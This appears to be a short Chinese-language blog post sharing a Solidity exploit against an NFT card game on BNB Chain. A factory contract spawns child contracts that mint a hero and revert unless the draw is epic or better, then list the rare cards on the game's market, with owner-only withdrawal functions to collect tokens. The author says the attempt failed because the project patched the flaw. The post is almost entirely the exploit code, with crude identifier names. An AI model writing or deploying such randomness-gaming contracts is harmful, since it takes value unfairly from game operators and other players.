一个很简单的游戏,随机抽卡 + 一个按钮打架的简单模式
首先说一下已经修复了,为什么我的变量名会写出这样 因为我喜欢
利用合约
// SPDX-License-Identifier: GPL-3.0
pragma solidity >=0.7.0 <0.9.0;
import './Ownable.sol';
import './IERC20.sol';
interface IBNBHero{
function createNewHero() external;
}
interface IBNBHCharacter{
function getRarity(uint256 _heroId) external view returns (uint256);
function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256 tokenId);
function approve(address to, uint256 tokenId) external;
function setApprovalForAll(address operator, bool _approved) external;
function safeTransferFrom(address from,address to,uint256 tokenId) external ;
}
interface IBNBHMarket{
function addListing(uint256 _id,uint256 _price) external;
}
interface IFUCK{
function ClaimTokenAndJerkOffFuckBitch1337() external;
}
contract LetSGO{
address public Owner = 0xec759d5fe395ffD698A0383A6A5CF1CAE8DEFA3d;
constructor(){
IERC20(0xD25631648E3Ad4863332319E8E0d6f2A8EC6f267).approve(0xde9fFb228C1789FEf3F08014498F2b16c57db855,150000000000000000000);
IFUCK(msg.sender).ClaimTokenAndJerkOffFuckBitch1337();
address BNBC = 0x6DA72F24c56197Dcf6B8920baCb183F6ccca8b01;
address BNBH = 0xde9fFb228C1789FEf3F08014498F2b16c57db855;
IBNBHero(BNBH).createNewHero();
uint256 HeroId = IBNBHCharacter(BNBC).tokenOfOwnerByIndex(address(this),0);
uint256 heroRA = IBNBHCharacter(BNBC).getRarity(HeroId);
require(heroRA >= 4,"HAHHHAH");
IBNBHCharacter(BNBC).setApprovalForAll(0x5CFFca0321b83dc873Bd2439aE7fEA10aE163fac,true);
IBNBHMarket(0x5CFFca0321b83dc873Bd2439aE7fEA10aE163fac).addListing(HeroId,300);
}
function emmergencyWithdraw13377(address _token, uint _amount) external returns(bool success){
require(Owner == msg.sender);
require(IERC20(_token).balanceOf(address(this)) >= _amount, "not enough tokens in contract");
IERC20(_token).transfer(msg.sender, _amount);
return true;
}
}
contract PUSSY is Ownable {
function addressFrom(address _origin, uint256 _nonce) internal pure returns (address _address) {
bytes memory data;
if(_nonce == 0x00) data = abi.encodePacked(bytes1(0xd6), bytes1(0x94), _origin, bytes1(0x80));
else if(_nonce <= 0x7f) data = abi.encodePacked(bytes1(0xd6), bytes1(0x94), _origin, uint8(_nonce));
else if(_nonce <= 0xff) data = abi.encodePacked(bytes1(0xd7), bytes1(0x94), _origin, bytes1(0x81), uint8(_nonce));
else if(_nonce <= 0xffff) data = abi.encodePacked(bytes1(0xd8), bytes1(0x94), _origin, bytes1(0x82), uint16(_nonce));
else if(_nonce <= 0xffffff) data = abi.encodePacked(bytes1(0xd9), bytes1(0x94), _origin, bytes1(0x83), uint24(_nonce));
else data = abi.encodePacked(bytes1(0xda), bytes1(0x94), _origin, bytes1(0x84), uint32(_nonce));
bytes32 hash = keccak256(data);
assembly {
mstore(0, hash)
_address := mload(0)
}
}
mapping(address => bool) public shuaige;
constructor(){
shuaige[msg.sender] = true;
}
uint256 public nonce = 1;
function createNewHero() external onlyOwner{
address contractAddress = addressFrom(address(this),nonce);
shuaige[contractAddress] = true;
new LetSGO();
nonce += 1;
}
function ClaimTokenAndJerkOffFuckBitch1337() external{
require(shuaige[msg.sender] == true);
IERC20(0xD25631648E3Ad4863332319E8E0d6f2A8EC6f267).transfer(msg.sender,43000000000000000000);
}
function emmergencyWithdraw13377(address _token, uint _amount) external onlyOwner returns(bool success){
require(IERC20(_token).balanceOf(address(this)) >= _amount, "not enough tokens in contract");
IERC20(_token).transfer(msg.sender, _amount);
return true;
}
}
首先利用是失败的,因为项目方发现了漏洞,所以我放弃了这次利用。整个合约很简单,就是交易回滚,开到史诗以上的卡就提交到市场。